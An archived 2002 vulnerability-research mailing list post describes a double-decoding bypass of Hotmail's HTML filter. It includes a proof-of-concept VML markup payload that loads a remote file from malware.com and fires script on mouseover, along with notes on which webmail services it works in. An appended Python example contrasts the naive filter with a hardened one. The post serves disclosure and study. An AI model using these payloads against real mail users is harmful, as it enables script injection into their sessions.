Vulnerability Development mailing list archives

Re: double decoding filter bypass (Hotmail) + challenge for you


From: "http-equiv () excite com" <http-equiv () malware com>
Date: Wed, 17 Jul 2002 23:16:35 -0000

<!-- So what about Hotmail ? Well, where can we put unicode in an 
html message ? Into an url as %xx, yep, but that's not the point 
here. There is a thing called "html entities" : you can replace *any* 
printable character by its ascii/unicode value in the values of the 
parameters of html tags, for instance in the parameters of the STYLE 
tag (hint !).  "A" is &#x41, "B" is &#x42, etc.
What the hotmail filter did is replacing any html entity by its 
corresponding character, then trying to filter out any bad string 
(forbidden keywords), THEN giving the output to the user, without re-
applying the filter on this output. But, if there are still html 
entities into this output, the user's browser will interpret them, 
that will possibly give birth to some interesting forbidden 
keywords... and fire a script.-->


Excellent. 

Here's another one for you FozZY:

<HTML xmlns:v = "urn:schemas-microsoft-com:vml">
<STYLE>v\:* {BEHAVIOR: url(#default#VML)}</STYLE>

<v:vmlframe 
style="LEFT: 50px; WIDTH: 300px; POSITION: relative; TOP: 30px; 
HEIGHT: 200px" 
src = 
"http://www.malware.com/fooness.vml#malware"></v:vmlframe>

where fooness.vml#malware is:

<xml xmlns:v = "urn:schemas-microsoft-com:vml">
  <v:rect id="malware" fillcolor="green"
    style="position:relative;top:1;left:1;width:20;height:20"
    onmouseover="alert('malware was here')">
  </v:rect>
</xml>

1. This works on Yahoo and Excite, probably others
2. Quick fiddling suggests only mouseover works
3. Hotmail only filters this:

<HTML xmlns:v = "urn:schemas-microsoft-com:vml">
<STYLE>v\:* {BEHAVIOR: url(#default#VML)}</STYLE>

which is absolutely required. Probably easier to mask than 
say "Javascript"

note 1: can't recall, Hotmail may not allow for retrieval of files 
remotely, or base64 encodes them on the Hotmail server if there are 
any. If so, you can embed and CID: the fooness.vml

note 2: the above may also work in IE dependent mail clients 
(Eudora..?..)

note 3: doesn't want to work in Outlook Express with scripting off 
even though the frame aspect works - which is patched in OE6

-- 
http://www.malware.com
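The quoted paragraph at the top of this post describes the ordering flaw in the Hotmail filter: decode entities once, strip forbidden keywords, then emit the result without re-checking it, so anything that is still an entity after the first decode reaches the recipient's browser untouched. The following Python is an added illustration written for this archive page, not code from the post, from Hotmail, or from either correspondent. The keyword list, the sample attribute values and the helper names (`naive_filter`, `hardened_filter`, `canonicalize`, `browser_view`) are all constructed for the demonstration; the real Hotmail keyword list is not on the page.

```python
import html

# Constructed keyword list for the demonstration; the page does not give
# the real one, only that "forbidden keywords" were filtered.
FORBIDDEN = ("javascript", "behavior", "expression")


def naive_filter(fragment: str) -> str:
    """The vulnerable order of operations the quoted text describes:
    decode entities once, strip forbidden keywords, emit without re-checking.
    (It is also case-sensitive, a second weakness not explored here.)"""
    decoded = html.unescape(fragment)
    for word in FORBIDDEN:
        decoded = decoded.replace(word, "")
    return decoded


def browser_view(fragment: str) -> str:
    """What the recipient's browser makes of an emitted attribute value:
    one more round of entity decoding."""
    return html.unescape(fragment)


def contains_forbidden(text: str) -> bool:
    """Case-insensitive keyword check used on the browser's view."""
    lowered = text.lower()
    return any(word in lowered for word in FORBIDDEN)


def canonicalize(fragment: str, max_rounds: int = 5) -> str:
    """Decode entities until the text stops changing (bounded), so the filter
    judges exactly the text the browser will eventually see. Deeply nested
    encodings are rejected rather than guessed at."""
    current = fragment
    for _ in range(max_rounds):
        nxt = html.unescape(current)
        if nxt == current:
            return current
        current = nxt
    raise ValueError("entity nesting too deep")


def hardened_filter(fragment: str) -> str:
    """Fixed order: canonicalize first, reject (not strip) forbidden keywords
    on the canonical form, then re-escape the output so it carries no live
    entity for the browser to decode into something the filter never saw."""
    canonical = canonicalize(fragment)
    if contains_forbidden(canonical):
        raise ValueError("forbidden keyword in canonical form")
    return html.escape(canonical, quote=True)


def hardened_rejects(fragment: str) -> bool:
    """True when the hardened filter refuses the fragment."""
    try:
        hardened_filter(fragment)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed sample: the keyword's first letter is encoded twice
    # (&amp;#x6A; -> &#x6A; -> j), the pattern the thread's subject refers to.
    double_encoded = "&amp;#x6A;avascript:alert(1)"

    emitted = naive_filter(double_encoded)
    print("naive filter emits :", emitted)
    print("browser then sees  :", browser_view(emitted),
          "(forbidden)" if contains_forbidden(browser_view(emitted)) else "")

    print("hardened rejects it:", hardened_rejects(double_encoded))

    # Benign values survive and are emitted with no live entities.
    print("hardened emits     :", hardened_filter("x &amp; y"))
    print("browser then sees  :", browser_view(hardened_filter("x &amp; y")))
```

The two defensive points the block makes are that keyword checks must run on a fully canonicalized value (decode to a fixed point, bounded), and that whatever is emitted must be re-escaped so the browser's decode step cannot produce text the filter never examined; stripping a keyword and passing the remainder through, as the naive version does, leaves the second decode to the client.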
